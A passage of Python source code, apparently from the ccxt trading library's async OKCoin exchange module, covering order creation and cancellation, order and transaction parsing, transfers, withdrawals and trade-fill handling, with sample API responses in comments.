# 'client_oid': 'abcdef1234567890', # [a-z0-9]{1,32}
# 'order_type': '0', # 0 = Normal limit order, 1 = Post only, 2 = Fill Or Kill, 3 = Immediatel Or Cancel, 4 = Market for futures only
}
clientOrderId = self.safe_string_2(params, 'client_oid', 'clientOrderId')
if clientOrderId is not None:
request['client_oid'] = clientOrderId
params = self.omit(params, ['client_oid', 'clientOrderId'])
method = None
if market['futures'] or market['swap']:
size = self.number_to_string(amount) if market['futures'] else self.amount_to_precision(symbol, amount)
request = self.extend(request, {
'type': type, # 1:open long 2:open short 3:close long 4:close short for futures
'size': size,
# 'match_price': '0', # Order at best counter party price?(0:no 1:yes). The default is 0. If it is set as 1, the price parameter will be ignored. When posting orders at best bid price, order_type can only be 0(regular order).
})
orderType = self.safe_string(params, 'order_type')
# order_type == '4' means a market order
isMarketOrder = (type == 'market') or (orderType == '4')
if isMarketOrder:
request['order_type'] = '4'
else:
request['price'] = self.price_to_precision(symbol, price)
if market['futures']:
request['leverage'] = '10' # or '20'
method = market['type'] + 'PostOrder'
else:
marginTrading = self.safe_string(params, 'margin_trading', '1') # 1 = spot, 2 = margin
request = self.extend(request, {
'side': side,
'type': type, # limit/market
'margin_trading': marginTrading, # 1 = spot, 2 = margin
})
if type == 'limit':
request['price'] = self.price_to_precision(symbol, price)
request['size'] = self.amount_to_precision(symbol, amount)
elif type == 'market':
# for market buy it requires the amount of quote currency to spend
if side == 'buy':
notional = self.safe_number(params, 'notional')
createMarketBuyOrderRequiresPrice = self.safe_value(self.options, 'createMarketBuyOrderRequiresPrice', True)
if createMarketBuyOrderRequiresPrice:
if price is not None:
if notional is None:
notional = amount * price
elif notional is None:
raise InvalidOrder(self.id + " createOrder() requires the price argument with market buy orders to calculate total order cost(amount to spend), where cost = amount * price. Supply a price argument to createOrder() call if you want the cost to be calculated for you from price and amount, or, alternatively, add .options['createMarketBuyOrderRequiresPrice'] = False and supply the total cost value in the 'amount' argument or in the 'notional' extra parameter(the exchange-specific behaviour)")
else:
notional = amount if (notional is None) else notional
request['notional'] = self.cost_to_precision(symbol, notional)
else:
request['size'] = self.amount_to_precision(symbol, amount)
method = 'marginPostOrders' if (marginTrading == '2') else 'spotPostOrders'
response = await getattr(self, method)(self.extend(request, params))
#
# {
# "client_oid":"oktspot79",
# "error_code":"",
# "error_message":"",
# "order_id":"2510789768709120",
# "result":true
# }
#
order = self.parse_order(response, market)
return self.extend(order, {
'type': type,
'side': side,
})
async def cancel_order(self, id, symbol=None, params={}):
"""
cancels an open order
:param str id: order id
:param str symbol: unified symbol of the market the order was made in
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: An `order structure <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
if symbol is None:
raise ArgumentsRequired(self.id + ' cancelOrder() requires a symbol argument')
await self.load_markets()
market = self.market(symbol)
type = None
if market['futures'] or market['swap']:
type = market['type']
else:
defaultType = self.safe_string_2(self.options, 'cancelOrder', 'defaultType', market['type'])
type = self.safe_string(params, 'type', defaultType)
if type is None:
raise ArgumentsRequired(self.id + " cancelOrder() requires a type parameter(one of 'spot', 'margin', 'futures', 'swap').")
method = type + 'PostCancelOrder'
request = {
'instrument_id': market['id'],
}
if market['futures'] or market['swap']:
method += 'InstrumentId'
else:
method += 's'
clientOrderId = self.safe_string_2(params, 'client_oid', 'clientOrderId')
if clientOrderId is not None:
method += 'ClientOid'
request['client_oid'] = clientOrderId
else:
method += 'OrderId'
request['order_id'] = id
query = self.omit(params, ['type', 'client_oid', 'clientOrderId'])
response = await getattr(self, method)(self.extend(request, query))
result = response if ('result' in response) else self.safe_value(response, market['id'], {})
#
# spot, margin
#
# {
# "btc-usdt": [
# {
# "result":true,
# "client_oid":"a123",
# "order_id": "2510832677225473"
# }
# ]
# }
#
# futures, swap
#
# {
# "result": True,
# "client_oid": "oktfuture10", # missing if requested by order_id
# "order_id": "2517535534836736",
# "instrument_id": "EOS-USD-190628"
# }
#
return self.parse_order(result, market)
def parse_order_status(self, status):
statuses = {
'-2': 'failed',
'-1': 'canceled',
'0': 'open',
'1': 'open',
'2': 'closed',
'3': 'open',
'4': 'canceled',
}
return self.safe_string(statuses, status, status)
def parse_order_side(self, side):
sides = {
'1': 'buy', # open long
'2': 'sell', # open short
'3': 'sell', # close long
'4': 'buy', # close short
}
return self.safe_string(sides, side, side)
def parse_order(self, order, market=None):
#
# createOrder
#
# {
# "client_oid":"oktspot79",
# "error_code":"",
# "error_message":"",
# "order_id":"2510789768709120",
# "result":true
# }
#
# cancelOrder
#
# {
# "result": True,
# "client_oid": "oktfuture10", # missing if requested by order_id
# "order_id": "2517535534836736",
# # instrument_id is missing for spot/margin orders
# # available in futures and swap orders only
# "instrument_id": "EOS-USD-190628",
# }
#
# fetchOrder, fetchOrdersByState, fetchOpenOrders, fetchClosedOrders
#
# # spot and margin orders
#
# {
# "client_oid":"oktspot76",
# "created_at":"2019-03-18T07:26:49.000Z",
# "filled_notional":"3.9734",
# "filled_size":"0.001", # filled_qty in futures and swap orders
# "funds":"", # self is most likely the same as notional
# "instrument_id":"BTC-USDT",
# "notional":"",
# "order_id":"2500723297813504",
# "order_type":"0",
# "price":"4013",
# "product_id":"BTC-USDT", # missing in futures and swap orders
# "side":"buy",
# "size":"0.001",
# "status":"filled",
# "state": "2",
# "timestamp":"2019-03-18T07:26:49.000Z",
# "type":"limit"
# }
#
# # futures and swap orders
#
# {
# "instrument_id":"EOS-USD-190628",
# "size":"10",
# "timestamp":"2019-03-20T10:04:55.000Z",
# "filled_qty":"10", # filled_size in spot and margin orders
# "fee":"-0.00841043",
# "order_id":"2512669605501952",
# "price":"3.668",
# "price_avg":"3.567", # missing in spot and margin orders
# "status":"2",
# "state": "2",
# "type":"4",
# "contract_val":"10",
# "leverage":"10", # missing in swap, spot and margin orders
# "client_oid":"",
# "pnl":"1.09510794", # missing in swap, spo and margin orders
# "order_type":"0"
# }
#
id = self.safe_string(order, 'order_id')
timestamp = self.parse8601(self.safe_string(order, 'timestamp'))
side = self.safe_string(order, 'side')
type = self.safe_string(order, 'type')
if (side != 'buy') and (side != 'sell'):
side = self.parse_order_side(type)
marketId = self.safe_string(order, 'instrument_id')
market = self.safe_market(marketId, market)
amount = self.safe_string(order, 'size')
filled = self.safe_string_2(order, 'filled_size', 'filled_qty')
remaining = None
if amount is not None:
if filled is not None:
amount = Precise.string_max(amount, filled)
remaining = Precise.string_max('0', Precise.string_sub(amount, filled))
if type == 'market':
remaining = '0'
cost = self.safe_string_2(order, 'filled_notional', 'funds')
price = self.safe_string(order, 'price')
average = self.safe_string(order, 'price_avg')
if cost is None:
if filled is not None and average is not None:
cost = Precise.string_mul(average, filled)
else:
if (average is None) and (filled is not None) and Precise.string_gt(filled, '0'):
average = Precise.string_div(cost, filled)
status = self.parse_order_status(self.safe_string(order, 'state'))
feeCost = self.safe_number(order, 'fee')
fee = None
if feeCost is not None:
feeCurrency = None
fee = {
'cost': feeCost,
'currency': feeCurrency,
}
clientOrderId = self.safe_string(order, 'client_oid')
if (clientOrderId is not None) and (len(clientOrderId) < 1):
clientOrderId = None # fix empty clientOrderId string
stopPrice = self.safe_number(order, 'trigger_price')
return self.safe_order({
'info': order,
'id': id,
'clientOrderId': clientOrderId,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': None,
'symbol': market['symbol'],
'type': type,
'timeInForce': None,
'postOnly': None,
'side': side,
'price': price,
'stopPrice': stopPrice,
'average': average,
'cost': cost,
'amount': amount,
'filled': filled,
'remaining': remaining,
'status': status,
'fee': fee,
'trades': None,
}, market)
async def fetch_order(self, id, symbol=None, params={}):
"""
fetches information on an order made by the user
:param str symbol: unified symbol of the market the order was made in
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: An `order structure <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOrder() requires a symbol argument')
await self.load_markets()
market = self.market(symbol)
defaultType = self.safe_string_2(self.options, 'fetchOrder', 'defaultType', market['type'])
type = self.safe_string(params, 'type', defaultType)
if type is None:
raise ArgumentsRequired(self.id + " fetchOrder() requires a type parameter(one of 'spot', 'margin', 'futures', 'swap').")
instrumentId = 'InstrumentId' if (market['futures'] or market['swap']) else ''
method = type + 'GetOrders' + instrumentId
request = {
'instrument_id': market['id'],
# 'client_oid': 'abcdef12345', # optional, [a-z0-9]{1,32}
# 'order_id': id,
}
clientOid = self.safe_string(params, 'client_oid')
if clientOid is not None:
method += 'ClientOid'
request['client_oid'] = clientOid
else:
method += 'OrderId'
request['order_id'] = id
query = self.omit(params, 'type')
response = await getattr(self, method)(self.extend(request, query))
#
# spot, margin
#
# {
# "client_oid":"oktspot70",
# "created_at":"2019-03-15T02:52:56.000Z",
# "filled_notional":"3.8886",
# "filled_size":"0.001",
# "funds":"",
# "instrument_id":"BTC-USDT",
# "notional":"",
# "order_id":"2482659399697408",
# "order_type":"0",
# "price":"3927.3",
# "product_id":"BTC-USDT",
# "side":"buy",
# "size":"0.001",
# "status":"filled",
# "state": "2",
# "timestamp":"2019-03-15T02:52:56.000Z",
# "type":"limit"
# }
#
# futures, swap
#
# {
# "instrument_id":"EOS-USD-190628",
# "size":"10",
# "timestamp":"2019-03-20T02:46:38.000Z",
# "filled_qty":"10",
# "fee":"-0.0080819",
# "order_id":"2510946213248000",
# "price":"3.712",
# "price_avg":"3.712",
# "status":"2",
# "state": "2",
# "type":"2",
# "contract_val":"10",
# "leverage":"10",
# "client_oid":"", # missing in swap orders
# "pnl":"0", # missing in swap orders
# "order_type":"0"
# }
#
return self.parse_order(response)
async def fetch_orders_by_state(self, state, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOrdersByState() requires a symbol argument')
await self.load_markets()
market = self.market(symbol)
type = None
if market['futures'] or market['swap']:
type = market['type']
else:
defaultType = self.safe_string_2(self.options, 'fetchOrder', 'defaultType', market['type'])
type = self.safe_string(params, 'type', defaultType)
if type is None:
raise ArgumentsRequired(self.id + " fetchOrdersByState() requires a type parameter(one of 'spot', 'margin', 'futures', 'swap').")
request = {
'instrument_id': market['id'],
# '-2': failed,
# '-1': cancelled,
# '0': open ,
# '1': partially filled,
# '2': fully filled,
# '3': submitting,
# '4': cancelling,
# '6': incomplete(open+partially filled),
# '7': complete(cancelled+fully filled),
'state': state,
}
method = type + 'GetOrders'
if market['futures'] or market['swap']:
method += 'InstrumentId'
query = self.omit(params, 'type')
response = await getattr(self, method)(self.extend(request, query))
#
# spot, margin
#
# [
# # in fact, self documented API response does not correspond
# # to their actual API response for spot markets
# # OKEX v3 API returns a plain array of orders(see below)
# [
# {
# "client_oid":"oktspot76",
# "created_at":"2019-03-18T07:26:49.000Z",
# "filled_notional":"3.9734",
# "filled_size":"0.001",
# "funds":"",
# "instrument_id":"BTC-USDT",
# "notional":"",
# "order_id":"2500723297813504",
# "order_type":"0",
# "price":"4013",
# "product_id":"BTC-USDT",
# "side":"buy",
# "size":"0.001",
# "status":"filled",
# "state": "2",
# "timestamp":"2019-03-18T07:26:49.000Z",
# "type":"limit"
# },
# ],
# {
# "before":"2500723297813504",
# "after":"2500650881647616"
# }
# ]
#
# futures, swap
#
# {
# "result":true, # missing in swap orders
# "order_info": [
# {
# "instrument_id":"EOS-USD-190628",
# "size":"10",
# "timestamp":"2019-03-20T10:04:55.000Z",
# "filled_qty":"10",
# "fee":"-0.00841043",
# "order_id":"2512669605501952",
# "price":"3.668",
# "price_avg":"3.567",
# "status":"2",
# "state": "2",
# "type":"4",
# "contract_val":"10",
# "leverage":"10", # missing in swap orders
# "client_oid":"",
# "pnl":"1.09510794", # missing in swap orders
# "order_type":"0"
# },
# ]
# }
#
orders = None
if market['swap'] or market['futures']:
orders = self.safe_value(response, 'order_info', [])
else:
orders = response
responseLength = len(response)
if responseLength < 1:
return []
# in fact, self documented API response does not correspond
# to their actual API response for spot markets
# OKEX v3 API returns a plain array of orders
if responseLength > 1:
before = self.safe_value(response[1], 'before')
if before is not None:
orders = response[0]
return self.parse_orders(orders, market, since, limit)
async def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
"""
fetch all unfilled currently open orders
:param str symbol: unified market symbol
:param int|None since: the earliest time in ms to fetch open orders for
:param int|None limit: the maximum number of open orders structures to retrieve
:param dict params: extra parameters specific to the okcoin api endpoint
:returns [dict]: a list of `order structures <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
# '-2': failed,
# '-1': cancelled,
# '0': open ,
# '1': partially filled,
# '2': fully filled,
# '3': submitting,
# '4': cancelling,
# '6': incomplete(open+partially filled),
# '7': complete(cancelled+fully filled),
return await self.fetch_orders_by_state('6', symbol, since, limit, params)
async def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
# '-2': failed,
# '-1': cancelled,
# '0': open ,
# '1': partially filled,
# '2': fully filled,
# '3': submitting,
# '4': cancelling,
# '6': incomplete(open+partially filled),
# '7': complete(cancelled+fully filled),
return await self.fetch_orders_by_state('7', symbol, since, limit, params)
def parse_deposit_address(self, depositAddress, currency=None):
#
# {
# address: '0x696abb81974a8793352cbd33aadcf78eda3cfdfa',
# currency: 'eth'
# tag: 'abcde12345', # will be missing if the token does not require a deposit tag
# payment_id: 'abcde12345', # will not be returned if the token does not require a payment_id
# # can_deposit: 1, # 0 or 1, documented but missing
# # can_withdraw: 1, # 0 or 1, documented but missing
# }
#
address = self.safe_string(depositAddress, 'address')
tag = self.safe_string_2(depositAddress, 'tag', 'payment_id')
tag = self.safe_string_2(depositAddress, 'memo', 'Memo', tag)
currencyId = self.safe_string(depositAddress, 'currency')
code = self.safe_currency_code(currencyId)
self.check_address(address)
return {
'currency': code,
'address': address,
'tag': tag,
'info': depositAddress,
}
async def fetch_deposit_address(self, code, params={}):
"""
fetch the deposit address for a currency associated with self account
:param str code: unified currency code
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: an `address structure <https://docs.ccxt.com/en/latest/manual.html#address-structure>`
"""
await self.load_markets()
parts = code.split('-')
currency = self.currency(parts[0])
request = {
'currency': currency['id'],
}
response = await self.accountGetDepositAddress(self.extend(request, params))
#
# [
# {
# address: '0x696abb81974a8793352cbd33aadcf78eda3cfdfa',
# currency: 'eth'
# }
# ]
#
addressesByCode = self.parse_deposit_addresses(response)
address = self.safe_value(addressesByCode, code)
if address is None:
raise InvalidAddress(self.id + ' fetchDepositAddress() cannot return nonexistent addresses, you should create withdrawal addresses with the exchange website first')
return address
async def transfer(self, code, amount, fromAccount, toAccount, params={}):
"""
transfer currency internally between wallets on the same account
:param str code: unified currency code
:param float amount: amount to transfer
:param str fromAccount: account to transfer from
:param str toAccount: account to transfer to
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: a `transfer structure <https://docs.ccxt.com/en/latest/manual.html#transfer-structure>`
"""
await self.load_markets()
currency = self.currency(code)
accountsByType = self.safe_value(self.options, 'accountsByType', {})
fromId = self.safe_string(accountsByType, fromAccount, fromAccount)
toId = self.safe_string(accountsByType, toAccount, toAccount)
request = {
'amount': self.currency_to_precision(code, amount),
'currency': currency['id'],
'from': fromId, # 1 spot, 5 margin, 6 funding
'to': toId, # 1 spot, 5 margin, 6 funding
'type': '0', # 0 Transfer between accounts in the main account/sub_account, 1 main account to sub_account, 2 sub_account to main account
}
if fromId == 'main':
request['type'] = '1'
request['sub_account'] = toId
request['to'] = '0'
elif toId == 'main':
request['type'] = '2'
request['sub_account'] = fromId
request['from'] = '0'
request['to'] = '6'
elif fromId == '5' or toId == '5':
marketId = self.safe_string_2(params, 'instrument_id', 'to_instrument_id')
if marketId is None:
symbol = self.safe_string(params, 'symbol')
if symbol is None:
raise ArgumentsRequired(self.id + ' transfer() requires an exchange-specific instrument_id parameter or a unified symbol parameter')
else:
params = self.omit(params, 'symbol')
market = self.market(symbol)
marketId = market['id']
if fromId == '5':
request['instrument_id'] = marketId
if toId == '5':
request['to_instrument_id'] = marketId
response = await self.accountPostTransfer(self.extend(request, params))
#
# {
# "transfer_id": "754147",
# "currency": "ETC",
# "from": "6",
# "amount": "0.1",
# "to": "1",
# "result": True
# }
#
return self.parse_transfer(response, currency)
def parse_transfer(self, transfer, currency=None):
#
# {
# "transfer_id": "754147",
# "currency": "ETC",
# "from": "6",
# "amount": "0.1",
# "to": "1",
# "result": True
# }
#
accountsById = self.safe_value(self.options, 'accountsById', {})
return {
'info': transfer,
'id': self.safe_string(transfer, 'transfer_id'),
'timestamp': None,
'datetime': None,
'currency': self.safe_currency_code(self.safe_string(transfer, 'currency'), currency),
'amount': self.safe_number(transfer, 'amount'),
'fromAccount': self.safe_string(accountsById, self.safe_string(transfer, 'from')),
'toAccount': self.safe_string(accountsById, self.safe_string(transfer, 'to')),
'status': self.parse_transfer_status(self.safe_string(transfer, 'result')),
}
def parse_transfer_status(self, status):
statuses = {
'true': 'ok',
}
return self.safe_string(statuses, status, 'failed')
async def withdraw(self, code, amount, address, tag=None, params={}):
"""
make a withdrawal
:param str code: unified currency code
:param float amount: the amount to withdraw
:param str address: the address to withdraw to
:param str|None tag:
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: a `transaction structure <https://docs.ccxt.com/en/latest/manual.html#transaction-structure>`
"""
tag, params = self.handle_withdraw_tag_and_params(tag, params)
self.check_address(address)
await self.load_markets()
currency = self.currency(code)
if tag:
address = address + ':' + tag
fee = self.safe_string(params, 'fee')
if fee is None:
raise ArgumentsRequired(self.id + " withdraw() requires a 'fee' string parameter, network transaction fee must be ≥ 0. Withdrawals to OKCoin or OKEx are fee-free, please set '0'. Withdrawing to external digital asset address requires network transaction fee.")
request = {
'currency': currency['id'],
'to_address': address,
'destination': '4', # 2 = OKCoin International, 3 = OKEx 4 = others
'amount': self.number_to_string(amount),
'fee': fee, # String. Network transaction fee ≥ 0. Withdrawals to OKCoin or OKEx are fee-free, please set as 0. Withdrawal to external digital asset address requires network transaction fee.
}
if 'password' in params:
request['trade_pwd'] = params['password']
elif 'trade_pwd' in params:
request['trade_pwd'] = params['trade_pwd']
elif self.password:
request['trade_pwd'] = self.password
query = self.omit(params, ['fee', 'password', 'trade_pwd'])
if not ('trade_pwd' in request):
raise ExchangeError(self.id + ' withdraw() requires self.password set on the exchange instance or a password / trade_pwd parameter')
response = await self.accountPostWithdrawal(self.extend(request, query))
#
# {
# "amount":"0.1",
# "withdrawal_id":"67485",
# "currency":"btc",
# "result":true
# }
#
return self.parse_transaction(response, currency)
async def fetch_deposits(self, code=None, since=None, limit=None, params={}):
"""
fetch all deposits made to an account
:param str|None code: unified currency code
:param int|None since: the earliest time in ms to fetch deposits for
:param int|None limit: the maximum number of deposits structures to retrieve
:param dict params: extra parameters specific to the okcoin api endpoint
:returns [dict]: a list of `transaction structures <https://docs.ccxt.com/en/latest/manual.html#transaction-structure>`
"""
await self.load_markets()
request = {}
method = 'accountGetDepositHistory'
currency = None
if code is not None:
currency = self.currency(code)
request['currency'] = currency['id']
method += 'Currency'
response = await getattr(self, method)(self.extend(request, params))
return self.parse_transactions(response, currency, since, limit, params)
async def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
"""
fetch all withdrawals made from an account
:param str|None code: unified currency code
:param int|None since: the earliest time in ms to fetch withdrawals for
:param int|None limit: the maximum number of withdrawals structures to retrieve
:param dict params: extra parameters specific to the okcoin api endpoint
:returns [dict]: a list of `transaction structures <https://docs.ccxt.com/en/latest/manual.html#transaction-structure>`
"""
await self.load_markets()
request = {}
method = 'accountGetWithdrawalHistory'
currency = None
if code is not None:
currency = self.currency(code)
request['currency'] = currency['id']
method += 'Currency'
response = await getattr(self, method)(self.extend(request, params))
return self.parse_transactions(response, currency, since, limit, params)
def parse_transaction_status(self, status):
#
# deposit statuses
#
# {
# '0': 'waiting for confirmation',
# '1': 'confirmation account',
# '2': 'recharge success'
# }
#
# withdrawal statues
#
# {
# '-3': 'pending cancel',
# '-2': 'cancelled',
# '-1': 'failed',
# '0': 'pending',
# '1': 'sending',
# '2': 'sent',
# '3': 'email confirmation',
# '4': 'manual confirmation',
# '5': 'awaiting identity confirmation'
# }
#
statuses = {
'-3': 'pending',
'-2': 'canceled',
'-1': 'failed',
'0': 'pending',
'1': 'pending',
'2': 'ok',
'3': 'pending',
'4': 'pending',
'5': 'pending',
}
return self.safe_string(statuses, status, status)
def parse_transaction(self, transaction, currency=None):
#
# withdraw
#
# {
# "amount":"0.1",
# "withdrawal_id":"67485",
# "currency":"btc",
# "result":true
# }
#
# fetchWithdrawals
#
# {
# amount: "4.72100000",
# withdrawal_id: "1729116",
# fee: "0.01000000eth",
# txid: "0xf653125bbf090bcfe4b5e8e7b8f586a9d87aa7de94598702758c0802b…",
# currency: "ETH",
# from: "7147338839",
# to: "0x26a3CB49578F07000575405a57888681249c35Fd",
# timestamp: "2018-08-17T07:03:42.000Z",
# status: "2"
# }
#
# fetchDeposits
#
# {
# "amount": "4.19511659",
# "txid": "14c9a8c925647cdb7e5b2937ea9aefe2b29b2c273150ad3f44b3b8a4635ed437",
# "currency": "XMR",
# "from": "",
# "to": "48PjH3ksv1fiXniKvKvyH5UtFs5WhfS2Vf7U3TwzdRJtCc7HJWvCQe56dRahyhQyTAViXZ8Nzk4gQg6o4BJBMUoxNy8y8g7",
# "tag": "1234567",
# "deposit_id": 11571659, <-- we can use self
# "timestamp": "2019-10-01T14:54:19.000Z",
# "status": "2"
# }
#
type = None
id = None
address = None
withdrawalId = self.safe_string(transaction, 'withdrawal_id')
addressFrom = self.safe_string(transaction, 'from')
addressTo = self.safe_string(transaction, 'to')
tagTo = self.safe_string(transaction, 'tag')
if withdrawalId is not None:
type = 'withdrawal'
id = withdrawalId
address = addressTo
else:
# the payment_id will appear on new deposits but appears to be removed from the response after 2 months
id = self.safe_string_2(transaction, 'payment_id', 'deposit_id')
type = 'deposit'
address = addressTo
currencyId = self.safe_string(transaction, 'currency')
code = self.safe_currency_code(currencyId)
amount = self.safe_number(transaction, 'amount')
status = self.parse_transaction_status(self.safe_string(transaction, 'status'))
txid = self.safe_string(transaction, 'txid')
timestamp = self.parse8601(self.safe_string(transaction, 'timestamp'))
feeCost = None
if type == 'deposit':
feeCost = 0
else:
if currencyId is not None:
feeWithCurrencyId = self.safe_string(transaction, 'fee')
if feeWithCurrencyId is not None:
# https://github.com/ccxt/ccxt/pull/5748
lowercaseCurrencyId = currencyId.lower()
feeWithoutCurrencyId = feeWithCurrencyId.replace(lowercaseCurrencyId, '')
feeCost = float(feeWithoutCurrencyId)
# todo parse tags
return {
'info': transaction,
'id': id,
'currency': code,
'amount': amount,
'network': None,
'addressFrom': addressFrom,
'addressTo': addressTo,
'address': address,
'tagFrom': None,
'tagTo': tagTo,
'tag': tagTo,
'status': status,
'type': type,
'updated': None,
'txid': txid,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'fee': {
'currency': code,
'cost': feeCost,
},
}
def parse_my_trade(self, pair, market=None):
# check that trading symbols match in both entries
userTrade = self.safe_value(pair, 1)
otherTrade = self.safe_value(pair, 0)
firstMarketId = self.safe_string(otherTrade, 'instrument_id')
secondMarketId = self.safe_string(userTrade, 'instrument_id')
if firstMarketId != secondMarketId:
raise NotSupported(self.id + ' parseMyTrade() received unrecognized response format, differing instrument_ids in one fill, the exchange API might have changed, paste your verbose output: https://github.com/ccxt/ccxt/wiki/FAQ#what-is-required-to-get-help')
marketId = firstMarketId
market = self.safe_market(marketId, market)
symbol = market['symbol']
quoteId = market['quoteId']
side = None
amountString = None
costString = None
receivedCurrencyId = self.safe_string(userTrade, 'currency')
feeCurrencyId = None
if receivedCurrencyId == quoteId:
side = self.safe_string(otherTrade, 'side')
amountString = self.safe_string(otherTrade, 'size')
costString = self.safe_string(userTrade, 'size')
feeCurrencyId = self.safe_string(otherTrade, 'currency')
else:
side = self.safe_string(userTrade, 'side')
amountString = self.safe_string(userTrade, 'size')
costString = self.safe_string(otherTrade, 'size')
feeCurrencyId = self.safe_string(userTrade, 'currency')
id = self.safe_string(userTrade, 'trade_id')
priceString = self.safe_string(userTrade, 'price')
feeCostFirstString = self.safe_string(otherTrade, 'fee')
feeCostSecondString = self.safe_string(userTrade, 'fee')
feeCurrencyCodeFirst = self.safe_currency_code(self.safe_string(otherTrade, 'currency'))
feeCurrencyCodeSecond = self.safe_currency_code(self.safe_string(userTrade, 'currency'))
fee = None
fees = None
# fee is either a positive number(invitation rebate)
# or a negative number(transaction fee deduction)
# therefore we need to invert the fee
# more about it https://github.com/ccxt/ccxt/issues/5909
if (feeCostFirstString is not None) and not Precise.string_equals(feeCostFirstString, '0'):
if (feeCostSecondString is not None) and not Precise.string_equals(feeCostSecondString, '0'):
fees = [
{
'cost': Precise.string_neg(feeCostFirstString),
'currency': feeCurrencyCodeFirst,
},
{
'cost': Precise.string_neg(feeCostSecondString),
'currency': feeCurrencyCodeSecond,
},
]
else:
fee = {
'cost': Precise.string_neg(feeCostFirstString),
'currency': feeCurrencyCodeFirst,
}
elif (feeCostSecondString is not None) and not Precise.string_equals(feeCostSecondString, '0'):
fee = {
'cost': Precise.string_neg(feeCostSecondString),
'currency': feeCurrencyCodeSecond,
}
else:
fee = {
'cost': '0',
'currency': self.safe_currency_code(feeCurrencyId),
}
#
# simplified structures to show the underlying semantics
#
# # market/limit sell
#
# {
# "currency":"USDT",
# "fee":"-0.04647925", # ←--- fee in received quote currency
# "price":"129.13", # ←------ price
# "size":"30.98616393", # ←-- cost
# },
# {
# "currency":"ETH",
# "fee":"0",
# "price":"129.13",
# "size":"0.23996099", # ←--- amount
# },
#
# # market/limit buy
#
# {
# "currency":"ETH",
# "fee":"-0.00036049", # ←--- fee in received base currency
# "price":"129.16", # ←------ price
# "size":"0.240322", # ←----- amount
# },
# {
# "currency":"USDT",
# "fee":"0",
# "price":"129.16",
# "size":"31.03998952", # ←-- cost
# }
#
timestamp = self.parse8601(self.safe_string_2(userTrade, 'timestamp', 'created_at'))
takerOrMaker = self.safe_string_2(userTrade, 'exec_type', 'liquidity')
if takerOrMaker == 'M':
takerOrMaker = 'maker'
elif takerOrMaker == 'T':
takerOrMaker = 'taker'
orderId = self.safe_string(userTrade, 'order_id')
return self.safe_trade({
'info': pair,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'id': id,
'order': orderId,
'type': None,
'takerOrMaker': takerOrMaker,
'side': side,
'price': priceString,
'amount': amountString,
'cost': costString,
'fee': fee,
'fees': fees,
}, market)
def parse_my_trades(self, trades, market=None, since=None, limit=None, params={}):
grouped = self.group_by(trades, 'trade_id')
tradeIds = list(grouped.keys())
result = []
for i in range(0, len(tradeIds)):
tradeId = tradeIds[i]
pair = grouped[tradeId]
# make sure it has exactly 2 trades, no more, no less
numTradesInPair = len(pair)
if numTradesInPair == 2:
trade = self.parse_my_trade(pair)
result.append(trade)
market = self.safe_market(None, market)
return self.filter_by_symbol_since_limit(result, market['symbol'], since, limit)
async def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
"""
fetch all trades made by the user
:param str symbol: unified market symbol
:param int|None since: the earliest time in ms to fetch trades for
:param int|None limit: the maximum number of trades structures to retrieve
:param dict params: extra parameters specific to the okcoin api endpoint
:returns [dict]: a list of `trade structures <https://docs.ccxt.com/en/latest/manual.html#trade-structure>`
"""
# okex actually returns ledger entries instead of fills here, so each fill in the order
# is represented by two trades with opposite buy/sell sides, not one :\
# self aspect renders the 'fills' endpoint unusable for fetchOrderTrades
# until either OKEX fixes the API or we workaround self on our side somehow
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchMyTrades() requires a symbol argument')
await self.load_markets()
market = self.market(symbol)
if (limit is not None) and (limit > 100):
limit = 100
request = {
'instrument_id': market['id'],
# 'order_id': id, # string
# 'after': '1', # pagination of data to return records earlier than the requested ledger_id
# 'before': '1', # P=pagination of data to return records newer than the requested ledger_id
# 'limit': limit, # optional, number of results per request, default = maximum = 100
}
defaultType = self.safe_string_2(self.options, 'fetchMyTrades', 'defaultType')
type = self.safe_string(params, 'type', defaultType)
query = self.omit(params, 'type')
method = type + 'GetFills'
response = await getattr(self, method)(self.extend(request, query))
#
# [
# # sell
# {
# "created_at":"2020-03-29T11:55:25.000Z",
# "currency":"USDT",
# "exec_type":"T",
# "fee":"-0.04647925",
# "instrument_id":"ETH-USDT",
# "ledger_id":"10562924353",
# "liquidity":"T",
# "order_id":"4636470489136128",
# "price":"129.13",
# "product_id":"ETH-USDT",
# "side":"buy",
# "size":"30.98616393",
# "timestamp":"2020-03-29T11:55:25.000Z",
# "trade_id":"18551601"
# },
# {
# "created_at":"2020-03-29T11:55:25.000Z",
# "currency":"ETH",
# "exec_type":"T",
# "fee":"0",
# "instrument_id":"ETH-USDT",
# "ledger_id":"10562924352",
# "liquidity":"T",
# "order_id":"4636470489136128",
# "price":"129.13",
# "product_id":"ETH-USDT",
# "side":"sell",
# "size":"0.23996099",
# "timestamp":"2020-03-29T11:55:25.000Z",
# "trade_id":"18551601"
# },
# # buy
# {
# "created_at":"2020-03-29T11:55:16.000Z",
# "currency":"ETH",
# "exec_type":"T",
# "fee":"-0.00036049",
# "instrument_id":"ETH-USDT",
# "ledger_id":"10562922669",
# "liquidity":"T",
# "order_id": "4636469894136832",
# "price":"129.16",
# "product_id":"ETH-USDT",
# "side":"buy",
# "size":"0.240322",
# "timestamp":"2020-03-29T11:55:16.000Z",
# "trade_id":"18551600"
# },
# {
# "created_at":"2020-03-29T11:55:16.000Z",
# "currency":"USDT",
# "exec_type":"T",
# "fee":"0",
# "instrument_id":"ETH-USDT",
# "ledger_id":"10562922668",
# "liquidity":"T",
# "order_id":"4636469894136832",
# "price":"129.16",
# "product_id":"ETH-USDT",
# "side":"sell",
